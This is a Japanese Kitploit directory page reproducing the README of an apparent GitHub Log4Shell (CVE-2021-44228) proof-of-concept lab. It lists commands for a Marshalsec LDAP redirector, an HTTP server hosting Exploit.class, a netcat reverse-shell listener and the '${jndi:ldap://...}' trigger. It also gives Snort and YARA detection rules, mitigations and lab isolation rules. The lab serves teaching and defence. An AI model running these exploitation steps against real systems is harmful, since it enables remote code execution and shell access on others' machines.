Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4Shell-PoC — **Log4Shell PoC は、CVE-2021-44228 の脆弱性を再現するように設計された高忠実度のエクスプロイト環境です。** JNDI インジェクション、LDAP/RMI リファラルリダイレクション、および Log4j 2 ライブラリを介したリモートコード実行(RCE)を実証するためのコンテナ化されたサンドボックスを提供します。 | Kitploit
ツール/GitHubGitHub/josemariamicoli/log4shell-poc
脆弱性分析エクスプロイトIDS/IPS回避ウェブアプリケーション悪用コマンド&コントロール学習と教育インシデントレスポンスペイロード開発ラボと実践
GitHubjosemariamicoli/log4shell-poc

Log4Shell-PoC

**Log4Shell PoC は、CVE-2021-44228 の脆弱性を再現するように設計された高忠実度のエクスプロイト環境です。** JNDI インジェクション、LDAP/RMI リファラルリダイレクション、および Log4j 2 ライブラリを介したリモートコード実行(RCE)を実証するためのコンテナ化されたサンドボックスを提供します。

208ヶ月前未レビュー
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║
██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║
███████╗╚██████╔╝╚██████╔╝ ██║███████║██║ ██║███████╗███████╗███████╗ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

                         ██████╗  ██████╗  ██████╗
                         ██╔══██╗██╔═══██╗██╔════╝
                         ██████╔╝██║   ██║██║     
                         ██╔═══╝ ██║   ██║██║     
                         ██║     ╚██████╔╝╚██████╔╝
                         ╚═╝      ╚═════╝  ╚═════╝ 

         ⚡ LOG4SHELL (CVE-2021-44228) PoC LAB
          [ 概念実証 & JNDI エクスプロイテーション ]

Log4Shell PoC は、CVE-2021-44228 の脆弱性を再現するために設計された高忠実度のエクスプロイト環境です。 Log4j 2 ライブラリを介した JNDI インジェクション、LDAP/RMI リファラルリダイレクション、およびリモートコード実行(RCE)を実証するためのコンテナ化されたサンドボックスを提供します。


⚠️ 免責事項

教育および許可されたセキュリティテストの目的でのみ使用してください。

事前の相互同意なしに対象を攻撃するためにこの概念実証を使用することは違法です。エンドユーザーは、該当するすべての地域・州・連邦法を遵守する責任を負います。著者は、このプログラムによって引き起こされたデータ損失、システム損傷、法的影響、または誤用について、いかなる責任も負いません。このソフトウェアを使用することにより、お住まいの法域の法的境界内で操作することに同意したものとみなされます。



セクション 2: プロジェクトの機能と構造

🚀 PoC の機能

  • JNDI インジェクション: 脆弱な Log4j 2.14.1 エントリポイント。
  • LDAP リファラルサーバー: Marshalsec による悪意のある LDAP リダイレクション。
  • リモートクラスローディング: コンパイルされた Java バイトコードの HTTP 配信。
  • マルチステージペイロード: Java ネイティブのリバースシェル実行。
  • 回避テスト: TrustURLCodebase および FormatMsgNoLookups バイパス。

🛠 PoC の構造

🛰 悪意のあるインフラストラクチャ(攻撃者)

攻撃者側は、PoC を促進するための 3 つの異なるチャネルで構成されています。

  • LDAP リダイレクタ(ポート 1389): Marshalsec 上に構築され、被害者の JNDI リクエストをホストされたエクスプロイトへ誘導します。
  • HTTP ペイロードサーバー(ポート 8888): 被害者がダウンロードして実行するための Exploit.class バイトコードをホストします。
  • NC リスナー(ポート 9001): リバースシェルの最終的なコールバック先。

💻 脆弱なインスタンス(被害者)

脆弱な Log4j 実装を実行する Docker 化された OpenJDK 8 環境です。

  • Log4j v2.14.1: 対象となるライブラリバージョン。
  • VulnerableLog.java: ユーザー入力をサニタイズせずにログに記録する単純な Java アプリケーション。


セクション 3: セットアップと実行手順

⚙️ セットアップと実行

1. 攻撃者のセットアップ(Arch Linux)

タブ 1: LDAP リファラルサーバー

docker run --rm -it -p 1389:1389 maven:3.8.6-openjdk-8 /bin/bash -c "
git clone [https://github.com/mbechler/marshalsec.git](https://github.com/mbechler/marshalsec.git) && \
cd marshalsec && \
mvn clean package -DskipTests && \
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer '[http://172.17.0.1:8888/#Exploit](http://172.17.0.1:8888/#Exploit)' 1389"

タブ 2: HTTP ペイロード配信

# Exploit.class を含むディレクトリで Python サーバーを起動
python3 -m http.server --bind 0.0.0.0 8888

タブ 3: Netcat リスナー

nc -lvnp 9001

2. 被害者の実行

タブ 4: 脆弱なコンテナの起動

docker run --rm -it -v $(pwd):/app -w /app openjdk:8u121-jdk-alpine /bin/sh

コンテナ内で: PoC のトリガー

java -Dlog4j2.formatMsgNoLookups=false \
     -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
     -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" \
     VulnerableLog '${jndi:ldap://172.17.0.1:1389/Exploit}'



セクション 4: 検出と緩和

🔍 検出と防御的モニタリング

1. ネットワーク検出(Snort/Suricata)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT Possible Log4j RCE Attempt (jndi)"; content:"jndi|3a|"; nocase; sid:2034647; rev:1;)

2. ログベースの検出(YARA)

rule Log4Shell_PoC_JNDI {
    meta:
        description = "Detects JNDI lookup strings in logs used in PoC"
        author = "Apex Pro Framework"
    strings:
        $jndi = / \$\{jndi:(ldap|rmi|dns|nis|iiop|corba|lds):/ i
        $obfuscated = /\$\{\$\{[^}]+\}ndi:/ i
    condition:
        any of them
}

🛡 インシデントレスポンス(IR)マトリクス

フェーズ手法アラート発動?MITRE ATT&CK
初期アクセス公開アプリケーションの悪用[ ]T1190
実行コマンドおよびスクリプティングインタープリタ[ ]T1059
コマンド&コントロールアプリケーション層プロトコル(LDAP)[ ]T1071.003
データ窃取非アプリケーション層プロトコル[ ]T1048

🔒 緩和と堅牢化

  1. アップデート: Log4j 2.17.1 以上にアップデートします。
  2. JVM フラグ: -Dlog4j2.formatMsgNoLookups=true を設定してルックアップを無効にします。
  3. クラスの削除: log4j-core JAR から JndiLookup.class を手動で削除します。

🔒 実施規則(Rules of Engagement)

  1. 分離: 対象 IP を内部 Docker ブリッジ(172.17.0.0/16)にハードコードします。
  2. ネットワーク: ホストオンリー/内部 VM ネットワークのみを使用します。
  3. C2 セキュリティ: Python または LDAP サーバーをパブリックインターネットに公開しないでください。

ツールをダウンロード